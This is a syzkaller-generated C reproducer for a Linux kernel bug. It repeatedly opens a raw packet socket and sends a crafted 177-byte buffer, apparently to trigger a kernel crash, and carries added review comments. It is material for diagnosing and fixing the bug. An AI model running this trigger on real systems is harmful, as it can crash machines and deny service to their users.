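// https://syzkaller.appspot.com/bug?id=bda19bf6b14e7fddccf28ac6f0205c7df6d8c32e
// autogenerated by syzkaller (https://github.com/google/syzkaller)
//
// Crash reproducer. The parent process forks one child per iteration, the
// child replays the recorded syscall sequence (execute_one) and exits, and
// the parent reaps it, killing it after 5 s if it has not finished, before
// starting the next iteration.

#define _GNU_SOURCE

// NOTE(review): the original listing carried 14 #include directives whose
// header names were lost in extraction. The set below covers every name the
// code visibly uses (kill/SIGKILL, waitpid, usleep/fork/write/syscall,
// clock_gettime/CLOCK_MONOTONIC, memcpy, exit, errno, SYS_* numbers,
// fixed-width ints); restore any further project headers from the original.
#include <errno.h>
#include <signal.h>
#include <stdint.h>
#include <stdlib.h>
#include <string.h>
#include <sys/syscall.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <time.h>
#include <unistd.h>

// Send SIGKILL to pid and block until it has been reaped into *status.
// waitpid(-1) is used so any other finished child is reaped along the way.
// A waitpid failure other than EINTR (e.g. ECHILD) ends the loop instead of
// spinning forever on a pid that can no longer be waited for.
static void kill_and_wait(int pid, int* status)
{
  kill(pid, SIGKILL);
  for (;;) {
    int reaped = waitpid(-1, status, 0);
    if (reaped == pid)
      break;
    if (reaped == -1 && errno != EINTR)
      break;
  }
}

// Sleep for ms milliseconds (thin usleep wrapper; sub-second values only
// are used by this program).
static void sleep_ms(uint64_t ms)
{
  usleep(ms * 1000);
}

// Monotonic clock in milliseconds; exits the process if the clock is
// unavailable, since the watchdog in loop() cannot work without it.
static uint64_t current_time_ms(void)
{
  struct timespec ts;
  if (clock_gettime(CLOCK_MONOTONIC, &ts))
    exit(1);
  return (uint64_t)ts.tv_sec * 1000 + (uint64_t)ts.tv_nsec / 1000000;
}

static void execute_one(void);

// Extra flags OR'ed into the non-blocking waitpid in loop(); none here.
#define WAIT_FLAGS 0

// Run execute_one() in a fresh child forever. Each child gets up to 5 s
// (polled every 10 ms); a child that overruns is killed and reaped so the
// next iteration always starts from a clean process.
static void loop(void)
{
  int iter = 0;
  for (;; iter++) {
    int pid = fork();
    if (pid < 0)
      exit(1);
    if (pid == 0) {
      execute_one();
      exit(0);
    }
    int status = 0;
    uint64_t start = current_time_ms();
    for (;;) {
      sleep_ms(10);
      if (waitpid(-1, &status, WNOHANG | WAIT_FLAGS) == pid)
        break;
      if (current_time_ms() - start < 5000)
        continue;
      // Watchdog expired: the child is stuck, kill it and move on.
      kill_and_wait(pid, &status);
      break;
    }
  }
}

// Result slot for the recorded syscall sequence; r[0] holds the socket fd
// once the socket() call succeeds (initialised to the "no result" marker).
uint64_t r[1] = {0xffffffffffffffff};

// Replay of the recorded sequence: open a raw socket, copy the fuzzer's
// 177-byte buffer into the fixed scratch mapping set up by main(), and send
// it with sendto() and no destination address. Return values of the
// syscalls are deliberately not checked, as in the generated original.
// NOTE(review): syzkaller's flag annotations below are heuristic; on Linux
// the numeric values are what is actually passed (0x11 is 17, which is
// AF_PACKET on Linux) — confirm against the target's socket.h.
static void execute_one(void)
{
  intptr_t res = 0;
  // Marker line on stdout; the write result is intentionally ignored.
  if (write(1, "executing program\n", sizeof("executing program\n") - 1)) {
  }
  res = syscall(SYS_socket, /*domain=AF_APPLETALK|AF_UNIX*/ 0x11ul,
                /*type=SOCK_RAW*/ 3ul, /*proto=*/0);
  if (res != -1)
    r[0] = res;
  memcpy(
      (void*)0x200000000740,
      "\xb1\x00\x05\x03\x90\x1c\x00\x00\x05\xb1\x08\x00\x07\x00\xca\x90\x0f\x0e"
      "\x08\xfe\xce\xa1\x1e\xa8\xfe\xf9\x68\xf3\xc7\x3f\xd3\x35\x7a\xfd\xeb\x2c"
      "\x09\x00\x85\x2e\x12\x63\x36\xac\xf0\x0b\x78\x04\xbe\x78\x1e\x49\x91\xf7"
      "\xad\xdf\x5f\x88\x2b\x2b\x7b\xe1\xaa\x79\x23\xed\x00\xf4\xc8\xb2\xca\x3e"
      "\xbb\xc2\x59\x69\x9a\x1f\x13\x2e\x27\xac\xb5\xd6\x02\x00\x0d\x7d\x02\x6b"
      "\xa8\xaf\x63\xff\x37\x28\x29\x34\xe4\xfd\x89\x72\x0f\xd3\x87\x2b\xab\xfb"
      "\xb7\x70\x08\xf5\xa8\x72\xc8\x81\xff\x7c\xc5\x3c\x89\x43\x03\xb2\x2f\x31"
      "\x0b\x40\x4f\x36\xa0\x0f\x90\x00\x6e\xe0\x1b\xe6\x57\xae\xa8\xc5\x00\x00"
      "\x00\x02\x00\x00\x00\x00\x00\x00\x0f\x02\x00\xa3\x71\xa3\xf8\x00\x00\xfe"
      "\xff\xff\xff\xff\xff\xff\x01\x00\x00\x00\x00\x00\x00\x00\x00",
      177);
  syscall(SYS_sendto, /*fd=*/r[0], /*buf=*/0x200000000740ul, /*len=*/0xb1ul,
          /*f=*/0ul, /*addr=*/0ul, /*addrlen=*/0ul);
}

// Set up the 16 MiB fixed scratch mapping that execute_one() writes its
// buffer into, then run the fork/replay loop. The mapping result is checked
// because a failed mmap (the flag bits are architecture-specific) would
// otherwise turn the memcpy in every child into a wild write that silently
// faults, and the parent would loop forever reporting nothing.
int main(void)
{
  long map = syscall(SYS_mmap, /*addr=*/0x200000000000ul, /*len=*/0x1000000ul,
                     /*prot=PROT_WRITE|PROT_READ|PROT_EXEC*/ 7ul,
                     /*flags=MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE*/ 0x1012ul,
                     /*fd=*/-1, /*offset=*/0ul);
  if (map == -1)
    exit(1);
  loop();
  return 0;
}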